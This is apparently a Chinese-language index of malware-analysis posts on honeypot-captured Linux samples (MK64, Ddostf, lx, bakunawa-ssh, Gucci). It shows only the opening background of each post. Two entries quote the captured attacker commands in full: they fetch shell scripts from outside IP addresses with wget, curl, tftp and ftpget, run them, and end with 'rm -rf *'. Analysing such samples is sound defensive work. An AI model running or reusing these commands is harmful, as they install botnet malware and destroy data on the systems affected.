-
MalwareMustDie MK64 样本分析
0x00 背景
这次捕获样本的亮点在于有个自保过程,也是有一定的Flood功能,VT上监测如下,但行为和标注出来的家族都不太一样,就暂且将其称为MK64吧,本文主要是静态分析动态验证一下,MMD:
-
MalwareMustDie Ddostf 样本分析
0x00 背景
蜜罐上又捕获一HFS上下载的恶意软件,从功能上看和之前的lx样本类似,只不过加了些Flood方法和功能,VT上一看原来都是是属于Ddostf家族。以后还是会分析些不同家族的样本,从多个角度分析样本的特征,毕竟时代在变化嘛。
-
MalwareMustDie lx样本分析
0x00 背景
蜜罐上捕获到
wget
下载的样本,顺着网址一访问发现是用HttpFileServer v2.3k 299
国产软件搭建的http服务,隐约感觉这种软件会有溢出漏洞,但也没时间去看页面就访问不了了。可以证明其下载的恶意软件出自国人之手,VT上也还没有相关的检测: -
MalwareMustDie bakunawa-ssh™样本分析
0x00 背景
最近还是通过ssh蜜罐捕获到样本,都是通过下载sh脚本文件并执行:
wget -qO - http://198.1.70.128/1sh | sh > /dev/null 2>&1 & rm -rf /var/run/1sh; wget -c http://198.1.70.128/1sh -P /var/run && sh /var/run/1sh & wget -qO - http://198.1.70.128/2sh | sh > /dev/null 2>&1 & rm -rf /tmp/2sh; wget -c http://198.1.70.128/2sh -P /tmp && sh /tmp/2sh & curl http://198.1.70.128/3sh | sh cd /dev/shm ; rm -rf tsh ; tftp -g 127.0.0.1 -r tsh ; sh tsh &
-
MalwareMustDie Gucci样本分析
0x00 背景
在ssh蜜罐上捕获到恶意样本,执行的命令如下:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.47.239.249/justyzoat.sh; chmod 777 justyzoat.sh; sh justyzoat.sh; tftp 212.47.239.249 -c get tutftp1.sh; chmod 777 tutftp1.sh; sh tutftp1.sh; tftp -r tutftp2.sh -g 212.47.239.249; chmod 777 tutftp2.sh; sh tutftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 212.47.239.249 tuftp1.sh tuftp1.sh; sh tuftp1.sh; rm -rf justyzoat.sh tutftp1.sh tutftp2.sh tuftp1.sh; rm -rf *